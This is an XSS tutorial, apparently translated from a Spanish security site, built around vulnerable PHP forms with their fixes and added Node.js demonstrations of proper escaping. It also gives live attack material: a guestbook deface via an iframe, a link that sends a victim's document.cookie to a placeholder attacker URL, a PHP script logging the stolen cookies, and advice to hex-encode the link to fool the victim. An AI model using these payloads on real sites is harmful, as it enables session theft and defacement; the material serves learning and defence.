http://www.soulblack.com.ar Security Research
XSS
CROSS SITE SCRIPTING
Chebyte
chebyte at gmail.com
Concepts

XSS (Cross Site Scripting): a type of vulnerability that arises from errors in filtering user input in web applications. It consists of using various techniques to inject markup (HTML), code that executes on the client machine (JavaScript/VBScript/ActiveX) or code that executes on the server (PHP/ASP) into the inputs of a web application, in order to achieve a wide range of objectives, limited only by what the injected language can do against the client or the server of the web application.
Injection: term referring to the insertion of some kind of code.
Cookies: a cookie is a fragment of information that a web page stores on the visitor's hard disk through their browser, at the request of the page's server. This information can later be retrieved by the server on subsequent visits.
Webapp: short for web application.
XSS is a fairly popular technique these days. Its threat is not aimed at the server itself so much as at the users and the site: through it data can be obtained by social engineering, simple defaces can be carried out, and so on. This article relies only on examples, since the technique in itself does not involve much theory.
Examples

Example 1

ejemplo1.php

<html>
<body>
<h1>Ejemplo 1</h1>
<form action='ejemplo1-2.php' method='post'>
<center><h1><b>Elige tu sistema favorito</b></h1></center><br>
<input type="radio" name="os" value="Linux">Linux<br>
<input type="radio" name="os" value="Windoz">Windoz<br>
<input type="radio" name="os" value="MacOS">MacOs<br>
<center><input type="submit" value="send"></center>
</form>
</body>
</html>
ejemplo1-2.php

<?php
$Choice = $_REQUEST['os'];           // vulnerable: the value is used as-is
// Solution: $Choice = htmlentities($_REQUEST['os']);
?>
<html>
<head><title>Ejemplo1</title></head>
<body>
<br>
<center>
<h1>Elegiste: <?php echo $Choice; ?></h1>
</center>
</body>
</html>

ejemplo1.php presents a poll; after an option is selected the data is sent to ejemplo1-2.php, where it is printed. This simple example allows XSS code to be injected, because the variable is printed without any filtering. An example injection could be:

http://victima.com/ejemplo1-2.php?os=<script>alert('CheByte')</script>

Although the form sends the value with POST, $_REQUEST also reads it from the query string, so the payload can be delivered in a plain link like the one above.
Example 2

ejemplo2.php

<html>
<body>
<b>Ejemplo 2</b>
<br>
<form action='./ejemplo2.php' method='post'>
URL de la imagen: <input type='text' name='url' value='http://' size='50'><br>
<input type='submit' name='submit' value='Enviar'>
</form>
<?php
if (!empty($_POST['submit'])) {
    $url = $_POST['url'];
    // Solution (as given in the article): $url = addslashes($url);
    echo "<img src=\"$url\">\n";     // vulnerable: $url goes straight into the attribute
}
?>
</body>
</html>
This example lets the user enter the URL of an image, which is then displayed. Since this example does not filter the input either, we could make the following injections.

In the URL field one could inject:

http://victima.com/hola.jpg"><script>alert('CheByte')</script>

The double quote closes the src attribute and the > closes the <img> tag, so the <script> that follows is parsed as markup. The comment in the code marks addslashes() as the solution, but addslashes() only puts a backslash in front of the quote, and inside an HTML attribute a backslash is an ordinary character, so the quote still closes the attribute and the injection still works. The value should instead be passed through htmlspecialchars() with ENT_QUOTES before it is printed.
Another type of injection we could enter in the URL box:

http://victima.com/hola.jpg"><script>alert(document.cookie)</script>

which displays the visitor's cookies for the site.
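The following is an added example, not code from the original article: a Node.js model of ejemplo1-2.php and ejemplo2.php that renders the two output contexts (HTML text in example 1, a quoted src attribute in example 2) with no filter, with the article's addslashes() suggestion, and with the equivalent of htmlspecialchars(..., ENT_QUOTES). The function names are this example's own; the payloads are the ones shown for examples 1 and 2.

```javascript
// Added example, not code from the original article: a Node.js model of
// ejemplo1-2.php and ejemplo2.php. It shows the two output contexts
// (HTML text in example 1, a quoted src attribute in example 2), why the
// article's addslashes() suggestion does not close the hole, and what
// htmlspecialchars(..., ENT_QUOTES) does. All function names are this
// example's own; the payloads are the ones from the article.

// Equivalent of PHP htmlspecialchars($s, ENT_QUOTES): the five characters
// that can change meaning inside HTML text or a quoted attribute value.
// (htmlentities(), named in the article, does the same for these five.)
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Equivalent of PHP addslashes(): a backslash before ' " \ and NUL.
// That is escaping for a string literal, not for HTML; browsers give the
// backslash no special meaning inside an attribute value.
function addslashes(s) {
  return String(s).replace(/[\\'"]/g, m => '\\' + m).replace(/\0/g, '\\0');
}

// Identity "filter": what both example pages actually do.
const noFilter = s => s;

// ejemplo1-2.php: the parameter lands in HTML text content.
function renderChoice(os, filter = noFilter) {
  return `<h1>Elegiste: ${filter(os)}</h1>`;
}

// ejemplo2.php: the parameter lands inside a double-quoted src attribute.
function renderImgTag(url, filter = noFilter) {
  return `<img src="${filter(url)}">`;
}

// Check good enough for these payloads: does the HTML still contain a
// literal "<script" that the tokenizer will treat as a tag? After proper
// escaping the '<' has become '&lt;'; after addslashes the quote still
// closes the attribute and the tag is intact.
function hasLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Payloads from the article (example 1 and example 2 respectively).
const PAYLOAD_TEXT = "<script>alert('CheByte')</script>";
const PAYLOAD_ATTR = 'http://victima.com/hola.jpg"><script>alert(\'CheByte\')</script>';

// Run every combination and report which ones leave a working script tag.
function runMatrix() {
  return {
    choiceRaw:     hasLiveScriptTag(renderChoice(PAYLOAD_TEXT)),
    choiceEscaped: hasLiveScriptTag(renderChoice(PAYLOAD_TEXT, escapeHtml)),
    imgRaw:        hasLiveScriptTag(renderImgTag(PAYLOAD_ATTR)),
    imgAddslashes: hasLiveScriptTag(renderImgTag(PAYLOAD_ATTR, addslashes)),
    imgEscaped:    hasLiveScriptTag(renderImgTag(PAYLOAD_ATTR, escapeHtml)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderImgTag(PAYLOAD_ATTR, addslashes));
  console.log(runMatrix());
}
```

Running it prints the tag addslashes() produces, `<img src="http://victima.com/hola.jpg\"><script>alert(\'CheByte\')</script>">`, in which the quote still terminates the attribute; only the htmlspecialchars()-style escaping leaves no live script tag in either context.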
Among the webapps most vulnerable to this type of attack are guestbooks, most of which perform no checks on the data, allowing a simple deface by entering HTML code. Because the data is stored in a database, the injected code runs for every visitor who views the guestbook, not only for the person who submitted it (stored XSS).

This deface could be carried out by injecting the following into the signature in the guestbook:

<iframe src=http://YOUR_SITE/hack.php></iframe>

The code of hack.php could look like:

<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length != 0) top.location = self.document.location;
// -->
</SCRIPT>
BY CHEBYTE

This causes hack.php to open as the top-level page, showing the text BY CHEBYTE, every time someone enters the guestbook: the script checks whether it is running inside a frame (top.frames.length != 0) and, if so, replaces the top window's location with its own.
With this technique we can also obtain data from the user, such as cookies. Next we will see an example of how to obtain them.

Suppose we find an XSS flaw on the site xxxx.com. We get the email address of the administrator or of some user and could send them the following link:

http://xxxx.com/gnusoft/images/Windows.gif name="hia" onload="hia.src='http://YOUR_URL/hack.php?cookie='%20+document.cookie;">

Where the code of hack.php would be:

<?php
$cookie = $_REQUEST['cookie'];
$file = fopen("cookies.txt", "a");   // append each captured cookie string
fputs($file, "$cookie\n");
fclose($file);
?>

When the user opens that link, the onload handler loads hack.php with document.cookie appended to the URL, so their cookies are sent automatically to our page hack.php, where they are stored in the file cookies.txt. Note that cookies set with the HttpOnly flag are not exposed through document.cookie and will not be captured this way. To make it a bit more realistic and make the deception harder to spot, the XSS code in the URL can be disguised by converting it to hexadecimal.
Symbol   Hex code
!        %21
"        %22
#        %23
$        %24
%        %25
&        %26
'        %27
(        %28
)        %29
*        %2A
+        %2B
,        %2C
-        %2D
.        %2E
/        %2F
:        %3A
;        %3B
<        %3C
=        %3D
>        %3E
?        %3F
@        %40
[        %5B
\        %5C
]        %5D
^        %5E
_        %5F
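The following is an added example, not code from the original article: the hexadecimal disguise just described, applied to the example 1 link, together with the URL decoding the web server performs before PHP fills $_REQUEST, which shows that the payload reaches the vulnerable page unchanged. The function names and the victima.com placeholder host are this example's own choices.

```javascript
// Added example, not code from the original article: the hexadecimal
// disguise the article suggests, applied to the example 1 link, plus the
// decoding the web server performs before PHP sees $_REQUEST, which shows
// that the payload arrives intact. Function names and the victima.com
// placeholder host are this example's own choices.

// Encode every character as %XX, as in the table above (ASCII input only).
function hexEncodeAll(s) {
  return Array.from(s, ch => {
    const code = ch.charCodeAt(0);
    if (code > 0x7f) throw new Error('hexEncodeAll: ASCII input only');
    return '%' + code.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

// Encode only the symbols (anything that is not a letter or digit). The
// letters stay readable but the characters that give the payload away,
// < > ' " ( ) / and so on, are hidden.
function hexEncodeSymbols(s) {
  return Array.from(s, ch => (/[A-Za-z0-9]/.test(ch) ? ch : hexEncodeAll(ch))).join('');
}

// The example 1 link, with the os= value run through the chosen encoder.
function disguisedLink(payload, encoder) {
  return 'http://victima.com/ejemplo1-2.php?os=' + encoder(payload);
}

// What ejemplo1-2.php receives in $_REQUEST['os']: the value after the
// query string has been URL-decoded. PHP also turns '+' into a space in a
// query string, which is why the encoders above turn '+' into %2B.
function serverSees(link) {
  const query = link.slice(link.indexOf('?') + 1);
  const value = query.slice(query.indexOf('=') + 1);
  return decodeURIComponent(value.replace(/\+/g, ' '));
}

// Payload from example 1.
const PAYLOAD = "<script>alert('CheByte')</script>";

if (typeof require !== 'undefined' && require.main === module) {
  for (const enc of [hexEncodeSymbols, hexEncodeAll]) {
    const link = disguisedLink(PAYLOAD, enc);
    console.log(link);
    console.log('  server sees:', serverSees(link));
  }
}
```

The disguise only hides the payload from a person reading the link; the server decodes it back to the original before the page uses it, so escaping the decoded value with htmlspecialchars() blocks the encoded link exactly as it blocks the plain one.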